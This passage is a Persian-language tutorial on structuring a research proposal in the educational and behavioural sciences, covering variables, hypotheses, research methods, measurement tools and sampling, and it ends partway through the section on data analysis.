براي تصويب يك طرح پژوهشي و تامين اعتبار آن ، لازم است تا پژوهشگر قصد پژوهشي خود را در پيشنهاد طرح پژوهشي (Proposal) به اطلاع افراد ذيربط و كساني كه اعتبار مالي طرح را تامين مي كنند برساند شايد در اينجا مناسب باشد بجاي كلمه يProposal از كلمهdesign استفاده نمود اماچون كلمهProposal معمول شده اينجانب نيز طرح پيشنهاده را Proposal تعريف نموده و به شرح آن مي پردازم . در پيشنهاد طرح تحقيق (Proposal) ، اهداف ، سئوالات و فرضيه ها ، ويژگيها ي روش اجراي تحقيق ، زمان و هزينه هاي لازم براي اجراي طرح تحقيق بايد به نحوي روشن و قانع كننده بيان شود . پژوهشگر بايد نهايت تلاش خود را بعمل آورد تا داوران طرح به سهولت به هدف پژوهش و ضرورت اجراي آن با توجه به طرح پيشنهادي (Proposal)پي برند.

propsal
براي تصويب يك طرح پژوهشي و تامين اعتبار آن ، لازم است تا پژوهشگر قصد پژوهشي خود را در پيشنهاد طرح پژوهشي (Proposal) به اطلاع افراد ذيربط و كساني كه اعتبار مالي طرح را تامين مي كنند برساند شايد در اينجا مناسب باشد بجاي كلمه يProposal از كلمهdesign استفاده نمود اماچون كلمهProposal معمول شده اينجانب نيز طرح پيشنهاده را Proposal تعريف نموده و به شرح آن مي پردازم . در پيشنهاد طرح تحقيق (Proposal) ، اهداف ، سئوالات و فرضيه ها ، ويژگيها ي روش اجراي تحقيق ، زمان و هزينه هاي لازم براي اجراي طرح تحقيق بايد به نحوي روشن و قانع كننده بيان شود . پژوهشگر بايد نهايت تلاش خود را بعمل آورد تا داوران طرح به سهولت به هدف پژوهش و ضرورت اجراي آن با توجه به طرح پيشنهادي (Proposal)پي برند.
اما قبل از اجراي يك پروپوزال لازم است پژوهشگر مشخصات خود را كه شامل نام ، نام خانوادگي، شغل ، سمت فعلي ، درجات علمي ، سوابق تحصيلي ، فعاليتهاي پژوهشي و سوابق شغلي و همچنين مشخصات همكاران اصلي طرح (شامل نام ، شغل ، درجه علمي و نوع همكاري ) بصورت طبقه بندي و در قالب و فرمتي در ابتداي پروپوزال (Proposal)بياورد .
اجزاي يك پروپوزال(Proposal):ا- عنوان 2- ضرورت و اهميت تحقيق 3-طرح مساله 4- شناسايي وبيان مساله 5- اهداف تحقيق 6- سئوالات تحقيق 7- فرضيات تحقيق 8- پيشينه تحقيق 9- روش تحقيق 10-ابزار اندازه گيري تحقيق 11- جامعه آماري 12- حجم نمونه 13- تجزيه و تحليل داده ها 14- شرح چارچوبهاي نظري تحقيق 15- بودجه وخدمات 16- فهرست منابع و ماخذ تحقيق

1- عنوان:
پس از آنكه پژوهشگر موضوع تحقيق را با توجه به علاقه ، توانايي خود و بديع بودن ، قابل پژوهش بودن، اهميت و اولويت داشتن و در دسترس بودن منابع اطلاعاتي و مالي موضوع انتخاب نمود بايد اين موضوع را با يك عنوان كه در برگيرنده تمام موضوع تحقيق باشد بيان نمايد .
عنوان تحقيق به فراخور نوع تحقيق ( بنيادي ، كاربردي و … ) بايد در عين خلاصه بودن دقيقاً بيان نمايد كه در حين تحقيق چه متغيير هايي بررسي خواهد شد ، همچنين مي بايست جامعه تحقيق ، زمان و مكان تحقيق در عنوان كاملاً مشهود باشد( در مورد تحقيقات كاربردي) .
بطور مثال مي توان به عناوين ذيل اشاره نمود :
الف – بررسي رابطه فقر و افت تحصيلي دانش آموزان دوره ابتدايي محمد آباد در سال تحصيلي 86-85 .
همانگونه كه ملاحظه مي كنيد دوره تحصيلي ، زمان و شهر (جامعه تحقيق) ، متغييرها فقر و افت تحصيلي در عنوان فوق كاملاً مشهود است و يا مي توان در موضوع هاي اجتماعي عنوان ذيل را مثال زد .
ب- شناسايي روند گرايش جوانان شهر اصفهان نسبت به مشاغل مختلف در دودهه گذشته .
در اين عنوان نيز زمان ، جامعه و متغيير مشهود است .
1-1- متغييرها
لازم است متغييرهاي تحقيق نيز به طور خلاصه بيان گردد. متغييرها را مي توان از نظر ماهيت مقادير به دو دسته تقسيم نمود الف– متغييرهاي كيفي(يا مقوله اي شامل حالت هاي گوناگون يك ويژگي است)، مانند : مذهب، شغل ، گروه خوني و … ب- متغييرهاي كمي ( متغييرهايي كه جهت اندازه گيري آنها مي توان اعداد را به وضعيت آزمودني و طبق قاعده اي معين منتسب كرد) كه به دو نوع 1- متغيير كمي گسسته، مانند: تعداد فرزندان و تعداد كتب و … 2- متغييركمي پيوسته ، مانند: قد و وزن و …
همچنين بطور كلي متغييرها را از نظر نقش مي توان به پنج دسته تقسيم نمود .
1- متغييرمستقل 2- متغيير وابسته 3- متغيير تعديل كننده 4- متغيير كنترل 5- متغيير مداخله گر
1- متغييرمستقل: يك ويژگي از محيط فيزيكي يا اجتماعي است كه بعد از انتخاب و دخالت پژوهشگر ،مقاديري را مي پذيرد تا تاثيرش بر ديگر متغييرها مشاهده شود .
2- متغيير وابسته: متغييري كه تغييرات آن تحت تاثير متغيير مستقل قرار مي گيرد.
بطور مثال در موضوع بررسي تاثير شيوه هاي تشويق بر يادگيري دانش آموزان ، يادگيري بعنوان متغيير وابسته و شيوه هاي تشويق بعنوان متغيير مستقل ايفاي نقش مي كنند.
3- متغيير تعديل كننده: متغيير كيفي يا كمي است كه جهت يا ميزان رابطه ميان متغييرهاي مستقل و وابسته را تحت تاثير قرار مي دهد.
بطور مثال در بررسي تاثير شيوه هاي مختلف تشويق بر يادگيري دانش آموزان دختر و پسر ، جنسيت نقش متغيير تعديل كننده را ايفا مي كند ، اين متغيير را متغيير مستقل دوم نيز مي گويند.
4- متغيير كنترل: در يك تحقيق ، پژوهشگر نمي تواند تاثير تمام متغيير ها را بر يكديگر مطالعه كند لذا بايد برخي متغييرها را كنترل كرده و آنها را خنثي نمايد.
بطور مثال در «چه رابطه اي ميان پيشرفت تحصيلي و عزت نفس دانش آموزان دختر سوم راهنمايي وجود دارد ؟
اثر پايه تحصيلي و جنسيت بر پيشرفت تحصيلي و عزت نفس كنترل مي شود.
5- متغيير مداخله گر:متغييري است كه محقق براي استنتاج از نحوه تاثير متغيير مستقل بر متغيير وابسته مورد نظر قرار مي دهد .
بطور مثال در يك طرح تحقيق كه هدف آن بررسي تاثير روش آموزش برنامه اي در مقايسه با سخنراني براي دروس رياضي پايه پنجم ابتدايي است ، متغيير مستقل روش تدريس و متغيير وابسته پيشرفت تحصيلي دانش آموزان است و از آنجاكه يادگيري متغييري است كه تاثير متغيير مستقل بر متغيير وابسته را تحت تاثير قرار مي دهد و مشاهده آن به طور مستقيم امكان پذير نمي باشد ، متغيير مداخله گر ناميده مي شود.

1-2- مقياس متغييرها:
بطور خلاصه مي توان متغييرها را با پنج مقياس زير اندازه گيري نمود :
1- اسمي( مانند خوب و بد ، شاد و غمگين ، 0و1، مجرد و متاهل و گروههاي خوني ) 2- رتبه اي(در اندازه گيري آنها ترتيب و رتبه اي قائل شويم مانند عالي ،خيلي خوب ، خوب ، متوسط و بد) 3- فاصله اي(هم ترتيب اشيا و هم فاصله بين آنها مشخص گردد مانند نمرات دانش آموزان در يك درس ) 4- نسبتي(اين مقياس دقيق ترين مقياس اندازه گيري است و داراي ارزش صفر حقيقي مي باشد ، نقطه اي در مقياس نمايانگر فقدان كامل ويژگي مورد اندازه گيري است و نقاط مختلف اين نوع مقياس قابل مقايسه اند مثلا 9 سال سه برابر سه سال است و اين نسبت برابر با 6 سال به دو سال است اما بهره هوشي يك مقياس فاصله اي است چون صفر مطلق ندارد ، لذا برتري هوشي فردي با بهره هوشي 120 نسبت به فردي با بهره هوشي 100 برابر با برتري فردي با بهره هوشي 144 به فردي با بهره هوشي 120 نمي باشد .)

2- ضرورت و اهميت تحقيق:
پژوهشگر تحقيقي را انتخاب مي كند كه ماهها برآن وقت صرف خواهد نمود لذا بايد به موضوع انتخابي خود علاقه مند باشد همچنين مواردي چون بديع بودن ، پژوهش پذير بودن ، اهميت و اولويت ، توانايي پژوهشگر ، تامين منابع مادي و اطلاعاتي ، به صرفه بودن و … را بايد توجه نمايد و با توجه به محورهاي ذكر شده فوق اين بند طرح پيشنهاده خود را نيز تكميل نمايد در اين مرحله پژوهشگر بايد ضرورت و اولويت انجام اين تحقيق را براي مخاطب روشن نمايد.
3- طرح مساله:
پژوهشگر در اين قسمت بايد بكوشد سئوالهاي وسوسه انگيز بسوي تحقيق جذب كند و ذهن مخاطب را از امور بديهي و هميشگي دور سازد وچالشي در ذهن او پديد آورد.

4– شناسايي و بيان مساله:
در اين مرحله پژوهشگر زمينه اي را به تصوير مي كشد كه در آن مساله رخ داده است همچنين در اين مرحله ويژگي هاي مساله ، گستردگي و علل احتمالي بروز آن نيز شناسايي مي گردد .
شايد بيان يك مساله روشن ، دقيق و قابل اجرا مشكلترين مرحله يك تحقيق باشد چرا كه بايد بتواند بخوبي اهميت مساله ، تحديد مساله در يك حوزهء تخصصي ، اهداف كلي در مورد تحقيقات انجام شده و چارچوبي براي ارائه نتايج تحقيق را بيان كند .

5- اهداف تحقيق :
در اجراي پژوهش هاي علمي پس از بيان مساله تحقيق ، پژوهشگر قصد خود را به صورت عملياتي كه از طريق مشاهده هاي عيني قابل دستيابي است بيان مي كند . در برخي از پژوهشها محقق به جاي طرح سئوال هاي پژوهشي يا فرضيه ، فقط به بيان هدف مي پردازد.
براي مثال ، هدف يك تحقيق تحقيق را مي توان به صورت زير بيان نمود :‌مشخص كردن سير تحول آموزش فني – حرفه اي در ايران .
براي بيان هدف بايد از يك فعل كنشي استفاده كرد . در مثال فوق «مشخص كردن » به عنوان فعل كنشي به كار رفته است .
اما هدف بالا بايد در اهداف جزيي متبلور شود به طور مثال مي توان با توجه به ابعاد مساله، اهداف جزيي ذيل را در نظر گرفت :
1- چگونگي پديد آمدن آموزش و پرورش در ايران .
2- رابطه آموزش فني – حرفه اي با ساير آموزش هاي رسمي كشور .

6- سئوالات تحقيق:
مساله ي تحقيق مي تواند در مطالعات كيفي و كمي بصورت سئوال بيان شود و غالباً شكل سئوالي بيان مساله ارجح است چرا كه ساده و گويا است و پژوهشگر را به سمت پاسخح دادن به اين سئوالات سوق مي دهد .
سئوالات تحقيق را مي توان به سه دسته تقسيم كرد : الف – توصيفي ب- رابطه اي ج- تفاوتي
الف – سئوالات توصيفي : در اين سئوالات از كلمات پرسشي « چه مي باشد؟» ، « چيست ؟» ، «چگونه است ؟» و … استفاده مي شود . براي مثال ، در مساله ، پيشرفت تحصيلي دانش آموزان سوم راهنمايي مناطق تابعه شهرستانهاي استان تهران شركت كنندگان در آزمون پيشرفت تحصيلي ، مي توان نوشت : سطح پيشرفت تحصيلي دانش آموزان سوم راهنمايي مناطق تابعه شهرستانهاي استان تهران شركت كنندگان در آزمون پيشرفت تحصيلي چگونه است ؟
ب- سئوالات رابطه اي :در اين دسته سئوالات ، چگونگي رابطه ي دو يا چند متغيير مورد نظر قرار مي گيرد . براي مثال ، چه رابطه اي بين مفهوم خود و پيشرفت تحصيلي وجود دارد ؟
ج- سئوالات تفاوتي : اين سئوال ها با تفاوت سطوح متغييرها سروكار دارد و معمولاً به شكل زير بيان مي شود :
آيا بين پيشرفت تحصيلي دختران و پسران پايه سوم راهنمايي تفاوتي وجود دارد ؟

7- فرضيات تحقيق :
فرضيات تحقيق حدس و گمان هاي خردمندانه اي است كه پژوهشگر در مورد روابط دو يا چند متغيير تحقيق خود دارد . فرضيات تحقيق بايد بصورت خبري بيان شود و نشان دهنده نتايج مورد انتظار از تحقيق باشد، بطور مثال :«بين مفهوم خود و پيشرفت تحصيلي رابطه مثبتي وجود دارد»
يك فرضيه هيچگاه اثبات يا ابطال نمي شود ، بلكه براساس داده هاي بدست آمده فقط تاييد يا رد مي شود . فرضيه ها بطور منطقي حدس ، گمان واحتمالي هستند و شواهد تجربي پژوهشگر را قادر مي سازد تا به نتيجه برسد كه بيان آن از نظر احتمالي صحيح است و بطور منطقي مي توان آنرا قبول كرد .
هرچند در بالا گفته شد كه فرضيات براساس حدس و گمان و احتمال پژوهشگر بيان مي گردند اما لازم به توضيح است كه اين حدس و گمان بايد بر اساس مفاهيم و يا نظريه هاي مرتبط با مساله و مشاهده هاي تجربي ناشي از تحقيقات قبلي باشد .

8- پيشينه تحقيق:
بطور كلي مي توان گفت پيشينه تحقيق نقد و بررسي دانش و اطلاعات موجود درباره موضوع تحقيق مورد نظر است . اگر اين نقد و بررسي درست انجام شود به بيان مساله كمك شاياني خواهد نمود.
در اينجا از اهداف نوشتن پيشينه تحقيق مي توان به 4 مورد ذيل اشاره نمود:
الف – تعريف و تحديد مساله : پژوهشگر مي تواند با مطالعه تحقيق هاي پيشين با گستره موضوع مورد مطالعه آشنا شود و با توجه به مفهومي كه در اين باره يافته است موضوع هاي فرعي آنرا مشخص كرده و مساله تحقيق را محدودتر كند.
ب- قرار دادن يافته هاي تحقيق در چارچوب تحقيقات قبلي : يعني پژوهشگر بيان مي كند كه تحقيقات قبلي چه سهمي در روشن شدن مساله مورد بررسي داشته اند و تحقيق خود چه نقشي در گسترش دانش درباره مساله مورد مطاله و بررسي خواهد داشت .
ج- اجتناب از دوباره كاري : پيشينه تحقيق مي تواند به پژوهشگر كمك كند تا از تكرارهاي ناخواسته خودداري نمايد و اگر تحقيق مشابهي انجام شده شايد پژوهشگر بخواهد عمداً تحقيق را براي اطمينان از نتايج آن تكرار كند.
د- انتخاب روش ها و ابزار اندازه گيري دقيق تر: با بررسي پيشينه تحقيق مي توان از ابزار اندازه گيري ، روش نمونه گيري و امثال آن آگاه شد و به نقاط قوت و ضعف آن پي برد و براي تحقيق موجود طرح تحقيق مناسبي را در نظر بگيرد.
براي پيشينه تحقيق مي توان از منابعي مانند: مطالعات ، نوشته هاي يك نظريه پرداز و محقق ، گزارش يك نظريه يا ناظر ، مطالعات تجربي منتشر شده در مجلات(علمي و فصلنامه ها)، نمايه ها و چكيده ها ، گزارش هاي تحقيق و پايان نامه ها ، كتابها ، مقالات منتشرشده استفاده نمود.

computers7-700x357

9- روش تحقيق:
در پژوهش هاي علوم رفتاري با دو رويكرد مواجه هستيم :
الف – رويكرد خردگرايانه ب-رويكرد طبيعت گرايانه
حوزه علوم رفتاري ، از جمله روان شناسي و علوم تربيتي ، انتخاب رويكرد انجام پژوهش بر پايه ي جهان بيني و نوع مثال فكري( پارادايم : مجموعه اي از مفروضه ها ، مفاهيم يا گزارش هاست كه از نظر منطقي به طور انعطاف پذيري به هم مرتبط بوده و جهت فكري و پژوهش را هدايت مي كند .
رويكرد خردگرايانه يعني واقعيت چيزي است كه فرد مي تواند به وسيله حواس خود آنرا تجربه كند. مثلاً : تاثير رفتار معلم بر يادگيري دانش آموزان را مي توان بدون مطالعه ي ساير متغييرها كه بر يادگيري دانش آموزان اثر مي كند بررسي كرد.
رويكرد طبيعت گرايانه نيز براين فرض استوار است كه واقعيت چيزي نيست كه همه بطور يكسان آن را مشاهده كنند و تجربه مشابهي از آن بدست آورند ، بنابراين در رويكرد طبيعت گرايانه مفروضه اصلي مورد تاكيد آن است كه واقعيت مورد مشاهده به تفسير افراد و ذهنيت آنان بستگي دارد .
بطور كلي روش هاي تحقيق در علوم رفتاري را مي توان با توجه به دو ملاك الف – هدف تحقيق ب- نحوه گردآوري داده ها تقسيم كرد .
الف – دسته بندي تحقيقات بر اساس هدف :
1- تحقيق بنيادي : هدف اين تحقيق آزمون نظريه ها ، تبيين روابط بين پديده ها و افزودن به مجموعه دانش موجود در يك زمينه خاص است.
2- تحقيق كاربردي : هدف از تحقيقات كاربردي توسعه دانش كاربردي در يك زمينه خاص است يعني اين تحقيقات به سمت كاربرد عملي دانش هدايت مي شوند.
3- تحقيق توسعه اي: به منظور تدوين و تشخيص مناسب بودن يك فراورده آموزشي (طرح ، روش ها و برنامه هاي درسي ) انجام مي شود .
ب- دسته بندي تحقيقات بر اساس نحوه گردآوري داده ها :
1- تحقيق توصيفي(غيرآزمايشي) 2- تحقيق آزمايشي 3- ساير روش ها
1- تحقيق توصيفي(غيرآزمايشي) : شامل مجموعه روش هايي است كه هدف آنها توصيف كردن شراتيط يا پديده هاي مورد بررسي است . اجراي تحقيق توصيفي مي تواند صرفا براي شناخت بيشتر شرايط موجود يا كمك رساندن به فرايند تصميم گيري باشد. تحقيقات توصيفي را مي توان به پنج دسته تقسيم كرد : ( پيمايشي، همبستگي، اقدام پژوهي، بررسي موردي ، تحقيق پس – رويدادي يا علي – مقايسه اي)
1-1- تحقيق پيمايشي : براي بررسي توزيع ويژگيهاي يك جامعه آماري روش تحقيق پيمايشي بكار مي رود.و براي پاسخ به سئوالات پژوهشي مانند سئوال هاي زير بكار مي رود. الف – ماهيت شرايط موجود چگونه است ؟ ب- چه رابطه اي ميان رويدادها وجود دارد ؟ ج- وضعيت موجود چگونه است ؟
همچنين اين تحقيق را مي توان به سه دسته روش مقطعي ، طولي و دلفي تقسيم نمود.
1-2- تحقيق همبستگي:در اين نوع تحقيق رابطه ميان متغييرها بر اساس هدف تحقيق تحليل مي گردد. تحقيق همبستگي را مي توان بر اساس هدف به سه دسته الف- مطالعه همبستگي دو متغييري ب- تحليل رگرسيون ج- تحليل ماتريس همبستگي يا كواريانس
1-3- اقدام پژوهي: هدف اين دسته از پژوهش هاي آموزشي ، توصيف شرايط يا پديده هاي مربوط به نظام آموزشي مي باشد . با استفاده از اقدام پژوهي مي توان موقعيت هاي نامعين ملموس مربوط به اقدام ها و عمليات آموزشي را مشخص كرد.هريك از افرادي كه در نظام آموزشي دست اندركار فعاليتهاي آموزشي مي باشند و به ويژه با فرايند ياددهي – يادگيري سروكار دارند ، مي توانند براي شناخت « مشكلات مبتلا به » آموزشي و پي بردن به راههاي كاهش اين مشكلات ، اقدام پژوهي را بطور انفرادي يا گروهي بكار برند. اين نوع تحقيق مي تواند بازخورد لازم براي بهبود واحدهاي آموزشي ، فرايند ياددهي – يادگيري و نيز ارزيابي آموخته ها ، را فراهم آورد.
1-4- بررسي موردي: بر خلاف پژوهش هاي آزمايشي، در اين روش پژوهشگر به دستكاري متغيير مستقل و مشاهده اثر آن بر متغيير وابسته نمي پردازد و يا مانند پژوهشگر پيمايشي كه با انتخاب نمونه اي با حجم وسيع و معرف از جامعه درباره تعدادي از متغييرها به بررسي مي پردازد ، عمل نمي كند ، بلكه به انتخاب يك «مورد» پرداخته و آن را از جنبه هاي بي شمار بررسي مي كند .
5- تحقيق پس – رويدادي (علي – مقايسه اي): معمولاً به تحقيقاتي گفته مي شود كه در آنها پژوهشگر با توجه به متغييروابسته به بررسي علل احتمالي وقوع آن مي پردازد. به عبارت ديگر تحقيق علي – مقايسه اي گذشته نگر بوده و سعي بر آن دارد كه از معلول به علت احتمالي پي برد. مثلاً به منظور شناسايي علل احتمالي شكست تحصيلي دانش آموزان مي توان از اين روش استفاده كرد .
2- تحقيق آزمايشي : به منظور برقراري رابطه ي علت – معلولي ميان دو يا چند متغيير از طرح هاي آزمايشي استفاده مي شود . در اين تحقيق گروه هاي آزمايشي و گواه مورد نظر قرار مي گيرند و از طريق آنها تفاوت هاي ميان آزمودني ها كنترل مي شود . اين كنترل را مي توان از طريق يكي از شيوه هاي ذيل بعمل آورد .
الف – انتساب تصادفي ب- همتا نمودن تصادفي ج- انتخاب همگن د- تحليل كواريانس ه- استفاده از آزمودني ها بعنوان كنترل خودشان .
2-1- انتساب تصادفي: در انتساب تصادفي هر يك از آزمودني ها با شانس مساوي به گروه آزمايشي يا گروه گواه منتسب مي شوند.
2-2- همتا كردن تصادفي: در اين شيوه سعي برآن است كه آزمودني هاي انتخاب شده از نظر متغيير ناخواسته همگن باشند. مثلا در يك آزمايش مي توان دانش آموزان را از نظر نمره هوش در زوج مرتب هاي يكسان قرار داد و بطور تصادفي يكي را در گروه گواه و ديگري را در گروه آزمايشي قرار داد .
2-3- انتخاب همگن: در اين انتخاب ، نمونه اي از آزمودني ها كه از نظر متغيير ناخواسته «همگن» هستند انتخاب مي شوند.سپس از ميان آنها به گروههاي گواه و آزمايشي منتسب مي شوند. براي مثال در تحقيق تاثير روش تدريس بر يادگيري بي سوادان بزرگسال ، پژوهشگر شك كند كه آيا سن بر متغيير وابسته تاثير دارد لذا گروه بي سوادان 25 تا 30 سال را انتخاب و روش تدريس را برآنان آزمايش مي كند .
2-4- تحليل كواريانس: براي كنترل متغيير ناخواسته مي توان از شيوه ي تحليل كوواريانس استفاده كرد . در اين شيوه داده هاي مربوط به متغيير ناخواسته ، كه قبل از اجراي آزمايش به دست مي آيد ، در تحليل نتايج مورداستفاده قرار مي گيرد .براي مثال توانايي قبلي بزرگسالان را مي توان با نمره هاي پيش- آزمون مورد سنجش قرار داد و سرانجام نمره ها را به عنوان اندازه گيري متغيير ناخواسته در تحليل نهايي دخالت داد ، بدين طريق اثرات «توانايي و دانش اوليه ي بي سوادان در خواندن » در هر دو گروه آزمايشي و گواه كاهش مي يابد .
2-5- استفاده از آزمودني ها به عنوان كنترل خودشان:مي توان بر افراد يك گروه آزمودني « عمل » آزمايشي را اجرا كرد و همان افراد را به عنوان كنترل خودشان مورد مشاهده قرار داد ، سپس نتيجه « عمل» را در قبل و بعد از اجراي « عمل » آزمايشي مشاهده و مقايسه كرد . براي مثال در تحقيق دو شيوه تدريس ابتدا يك روش تدريس شده و سپس شيوه دوم و در نهايت اثرات دو روش بررسي مي شود .
2-6- تحقيق شبه آزمايشي: معمولاً در تحقيقات علوم رفتاري استفاده از روش هاي انتساب تصادفي دشوار است . به طرح هاي آزمايشي كه در آن ها نتوان از انتساب تصادفي استفاده كرد ، طرح هاي شبه آزمايشي گويند . انواع طرح هاي شبه آزمايشي به شرح زير مي باشد : الف – طرح هاي تك – گروهي سري هاي زماني ب- طرح هاي شبه آزمايشي با گروه گواه ج-طرح هاي تك آزمودني .
3- ساير روش ها:
3-1- روش تحقيق تاريخي: سئوالاتي مانند « تشكيلات و نظام آموزشي كشور چگونه تحول يافته ؟» را مي توان با استفاده از روش تاريخي پاسخ داد . هدف از تحقيق تاريخي به كار بردن داده هاي مربوط به واقعيت هاي مرتبط با رويدادهاي گذشته و تفسير آن ها است . از اين طريق مي توان به عوامل مؤثر در بروز وقايعي كه در گذشته رخ داده است پي برد و رويدادهاي زمان حال را بهتر شناخت ..
3-2- روش تحقيق فلسفي: روش فلسفي با توجه به ماهيت خود ( تجزيه و تحليل مفاهيم ) كاربرد فعالي در كليه زمينه هاي علمي از جمله تعليم و تربيت دارد پژوهشگران تعليم و تربيت به دنبال آموزش روش هاي چگونگي كسب دانش و تدوين نظريه هايي درباره يادگيري هستند و قبل از هر چيز به درك دانش و تعريف آن در معناي واقعي خود نياز دارند و اين تعريف در مفاهيم فلسفي يافت مي شود .فيلسوف از طريق مطالعه يادگيري و فرايند ياددهي به «علم در حيطه عمل» آگاهي مي يابد و متخصصان تعليم و تربيت با كمك مفاهيم فلسفي به روابط و نكات افتراقي ميان دانش از يك طرف و غريزه ، نگرش ها ، نهادها ؛ عادت ها و يا احساسات از طرف ديگر و همچنين به تفاوت بين يادگيري و تجربه پي مي برد .
3-3- روش تحقيق قوم نگاري: در اين تحقيق پژوهشگر به توصيف علمي فرهنگ ها ي مختلف مي پردازد . باتوجه به تعريف فوق ، هدف تحقيق قوم نگاري ثبت و توصيف رويدادها ، فرايندها در شرايط طبيعي و ويژه آنها مي باشد . از اين تحقيق مي توان در تعليم و تربيت استفاده نمود، تحقيقات قوم نگاري در تعليم و تربيت ، توصيف علمي از سيستم هاي ياددهي – يادگيري ، فرايند ها و پديده هاي تربيتي در درون بافت هاي ويژه نظام هابي آموزشي فراهم مي آورد.
3-4- تحليل محتوا :‌ براي بررسي محتواي آشكار پيام هاي موجود در يك متن مي توان از روش تحليل محتوا استفاده نمود .

10- ابزار اندازه گيري در تحقيق:الف – پرسشنامه ب- مصاحبه ج- مشاهده د- مقياس هاي اندازه گيري نگرش ها ه- آزمون هاي رواني – تربيتي و- قابليت اعتماد ابزار اندازه گيري
الف – پرسشنامه : پرسشنامه يكي از ابزارهاي رايج تحقيق است و روشي مستقيم براي كسب داده هاي تحقيق است . از اين طريق مي توان دانش ، علايق ، نگرش و عقايد فرد را مورد ارزيابي قرار داد ، به تجربيات قبلي پي برد و به آنچه در حال حاضر انجام مي دهد آگاهي يافت .
ب- مصاحبه : با اين ابزار امكان برقراري تماس مستقيم با مصاحبه شونده فراهم مي گردد و با اين كار مي توان به ارزيابي عميق تر ادراك ها ، نگرش ها ، علايق و آرزوهاي آزمودني پرداخت
ج- مشاهده : يكي از ابزار جمع آوري داده ها در علوم رفتاري خصوصاً در روان شناسي تحولي و اجتماعي ، مشاهده است . مشاهده عبارتست از شناسايي ، نامگذاري ، مقايسه ، توصيف و ثبت آنچه روي مي دهد .
د- مقياس هاي اندازه گيري نگرش ها : از جمله ابزار گرد آوري داده ها در تحقيقات علوم رفتاري ، مقياس هاي اندازه گيري نگرش است . بطور كلي مقياس ها براي سنجش نگرش ها ، قضاوت ها ، عقايد و ساير خصيصه هايي كه به آساني قابل اندازه گيري نيستند به كار مي رود . براي اندازه گيري نگرش ها مي توان از مقياس هاي ذيل استفاده كرد : مقياس ليكرت ، مقياس افتراق معنايي ، مقياس ثرستون ، مقياس گاتمن و مقياس فاصله اجتماعي بوگاردوس .
ه- آزمون هاي رواني – تربيتي : در تحقيقات علوم رفتاري ، از آزمونهاي رواني – تربيتي به عنوان يكي از ابزارهاي گردآوري داده ها استفاده مي شود. آزمون وسيله اي است براي اندازه گيري منظم نمونه هايي از رفتار آزمودني . آزمون براي ارزيابي تفاوت هاي فردي و يا تفاوتهايي كه در فرد در مواقع مختلف ديده مي شود ، بكار مي رود . آزمونها بر اساس خصيصه اندازه گيري شده به سه گروه بزرگ تقسيم مي شوند :
آزمون هاي هوش و استعداد ، آزمون هاي پيشرفت تحصيلي و آزمون هاي رغبت ، نگرش و شخصيت .
و- قابليت اعتماد ابزار اندازه گيري : قابليت اعتماد يكي از ويژگيهاي فني ابزار اندازه گيري است و به اين معني است كه ابزار اندازه گيري در شرايط يكسان تا چه اندازه نتايج يكساني را بوجود مي آورد : براي اين كار مي توان از روش هاي ذيل به اين خواسته دست يافت :
1- اجراي دوباره آزمون يا روش بازآزمايي 2- روش موازي يا استفاده از آزمونهاي همتايي 3- روش تنصيف(دو نيمه كردن) 4- روش كودر-ريچاردسون 5- روش آلفاي كرونباخ

11- جامعه آماري:

يك جامعه آماري عبارت است از مجموعه اي از افراد يا واحدها كه داراي حداقل يك صفت مشترك باشند. بطور معمول در هر تحقيقي جامعه مورد بررسي يك جامعه ي آماري مي باشد كه پژوهشگر مايل است درباره صفت (صفت ها) متغيير واحدهاي آن با مطالعه بپردازد . بطور مثال اگر پژوهشگري مايل باشد درباره مشكلات اجتماعي – اقتصادي دانشجويان ايران بپردازد جامعه آماري مورد بررسي شامل تمام افرادي است كه در نظام آموزش عالي ايران در يك مقطع زماني مشخص ثبت نام كرده اند .
جامعه آماري بايد جامع و مانع باشد ، يعني بايد چنان باشد كه از نقطه نظر زماني و مكاني همه واحدهاي مورد مطالعه را در برگيرد و در ضمن ، با توجه به آن ، از شمول واحدهايي كه نبايد به مطالعه آن ها پرداخته شود جلوگيري بعمل آيد.

12- حجم نمونه:

به منظور گردآوري داده هاي مورد نياز درباره افراد افراد جامعه مي توان يكي از روش هاي زير بكار برد : 1 – سرشماري 2- نمونه گيري
1-11 – سرشماري : در اين روش به طريق شمارش كامل ، از هريك از افراد جامعه داده هاي مورد نظر گردآوري مي شود.
2-11- نمونه گيري: الف- تصادفي ساده ب- سيستماتيك ج- طبقه اي د- خوشه اي ه- چندمرحله اي
الف- نمونه گيري تصادفي ساده :در اين نمونه گيري به هر يك از افراد جامعه احتمال انتخاب مساوي داده مي شود . به عبارت ديگر اگر حجم افراد جامعه N و حجم نمونه راn فرض كنيم ، احتمال انتخاب هر فرد جامعه در نمونه مساوي است . مثلا اگر در يك دبيرستان 400نفري بخواهيم 20 نفر انتخاب كنيم شانس انتخاب هر يك از دانش آموزان اين دبيرستان خواهد شد .
ب- نمونه گيري سيستماتيك : براي انتخاب يك نمونه به حجم n از يك جامعه به حجم N ، ابتدا حجم جامعه را بر حجم نمونه تقسيم مي كنيم تا فاصله نمونه گيري مشخص شود:I = . سپس يك عدد تصادفي چنان انتخاب مي كنيم كه كوچكترين يا مساوي فاصله نمونه گيري باشد. مثلاًاگراولين عدد انتخاب شده را i بناميم ( ) نفرات بعدي نيز از فرمولهاي ذيل بدست مي آيد : i) +i ,(I+i),(2I+i),…,((n-1)
چ- نمونه گيري طبقه اي : در نمونه گيري طبقه اي ، واحدهاي جامعه مورد مطالعه در طبقه هايي كه از نظر صفت متغيير همگن تر هستند ، گروه بندي مي شوند ، تا تغييرات آن ها در درون گروه ها كمتر شود . سپس از هر يك از طبقات تعدادي انتخاب مي شوند .
د- نمونه گيري خوشه اي : اگر فهرست كامل افراد در دسترس نباشد مي توان افراد جامعه را در دسته هايي خوشه بندي كرد . سپس از ميان خوشه ها نمونه گيري كرد .
ه- نمونه گيري چند مرحله اي: در اين نمونه گيري افراد جامعه با توجه به سلسله مراتبي ( از واحدهاي بزرگتر به كوچكتر ) از انواع واحدهاي جامعه انتخاب مي شوند . بطور مثال اگر افت تحصيلي دانش آموزان سوم راهنمايي يك منطقه مورد مطالعه قرار گيرد مي توان مرحلع اول نمونه گيري را مدارس ، مرحله دوم را كلاس و مرحله سوم را دانش آموزان كلاس در نظر گرفت .

13- تجزيه و تحليل داده ها :به طور كلي داده ها نمايانگري از واقعيت ها ، مفاهيم ، يا دستورالعمل ها مي باشند. چنانچه داده ها به صورت واژه به توصيف واقعيت ها بپردازد آن ها را داده هاي كيفي و چنانچه داده ها به صورت عدد و رقم باشد آن ها را داده هاي كمي گويند .
تنظيم و تحليل داده هاي كيفي مستلزم انجام سه فعاليت زير است.
